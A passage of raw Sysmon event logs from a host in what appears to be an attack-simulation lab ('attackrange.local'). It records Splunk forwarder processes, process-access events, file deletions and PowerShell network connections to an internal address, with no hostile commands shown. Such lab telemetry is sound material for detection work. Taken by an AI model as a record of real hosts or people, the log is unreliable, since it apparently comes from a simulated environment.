Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083719Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.745{B81B27B7-4D33-613A-1D90-03000000C801}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083718Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:43.108{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7152692B079295EC0DD3885CF9297FE0,SHA256=2E02239507B58A78BCDBF338C9A121CB2D7375BC118F583DDFD369578699F32D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.944{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D34-613A-1F90-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:44.944{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.944{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:44.944{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.944{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:44.944{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4D34-613A-1F90-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.929{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D34-613A-1F90-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.924{B81B27B7-4D34-613A-1F90-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.792{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB551ED9F255E8E15BADDD7F10F97888,SHA256=4BD7151D25D337EAE72D73928876E2D09C7304C427E0749CCA73EC2F90C1CD10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.792{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B71CF7AC13338D3FA71F18F6A9B67E12,SHA256=23B3688530B31D1CCB6B39F3F435B0697820D676139835DE462798BC039AC20E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.607{B81B27B7-4D34-613A-1E90-03000000C801}15842408C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D34-613A-1E90-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:44.359{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:06:44.359{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D34-613A-1E90-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.359{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D34-613A-1E90-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.345{B81B27B7-4D34-613A-1E90-03000000C801}1584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:44.128{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=774E5A0AC53132259D52E3A2AEAAC8FE,SHA256=C67AB6D2C79FC010C72F09638E7C19F0CAFF2452AD606C348D1FD74D640AAFB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035083749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:45.943{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB551ED9F255E8E15BADDD7F10F97888,SHA256=4BD7151D25D337EAE72D73928876E2D09C7304C427E0749CCA73EC2F90C1CD10,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:45.160{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A959E5BDF2BB6BFB1A167ED6282114E,SHA256=8D390F2C2ED7E70D3EF91B04C8128B0CA68895B5B057B43F4C1A43E506299D1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:46.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AFB351BCD400B24A32855E7B7D5614A2,SHA256=DBA06C59A8548FB035A6563961F9063003746F526D2A2BEE6BDB520BCDE83FB0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:46.190{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1B211FBA11EA7328AFF963FF1C38163,SHA256=D21AF0F51443D089D7AA3CC26A2E8C3F008A43D49B0C4934351F01C186CB4CD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:12.071{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56511-false10.0.1.12-8000- 354300x800000000000000035083753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:11.304{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56510-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:47.204{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65BD6EE5041827B7B8D6043B57AA266D,SHA256=E09A9C2AEB643C23FE89A0DF6864C4DBC80D14EE43D75D7887FF3A5209CC33AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:48.223{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B60E4304DCC0D5C2C504FA4E4A0D0BE,SHA256=7566513E4DDA48DCCEC7999186BF2E2B9D64CA4D820C8E941BEDE638784AC60A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:49.240{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B839DA75BDBD1BE4B424D9C2603A9C,SHA256=E3DA3933AF2CDF19CFC247B8855F5D3637F5DE89E130CB5BBC5F7C05A0AC849D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:50.322{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=1326C91D00BC24DCDD750E2153E34F63,SHA256=2799D02D9B990A36C344378AD520DED67AF27D7FE23EF58290C99DB9FED6730E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:50.270{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66634ECF1117E507F29404FC37828D44,SHA256=A9B5FC4F77CE70BABE57F3F9E5A6847C74674E29CE4F2C8ABF6E0E14F02F79AC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035083760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:15.315{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56512-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:51.300{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10EB62F8772A5C9FE053C8FEA77A38B1,SHA256=63FA8425F09975FF1DFC4D57577F5A2D0C3067984726F76C11BE36BF54711759,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:06:52.318{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D92C01A0E05B2C027B03D03988877360,SHA256=ABBADD382596F6BE5959372813AA9C6371419307595FC786F4C79D6AA9343079,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:18.048{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 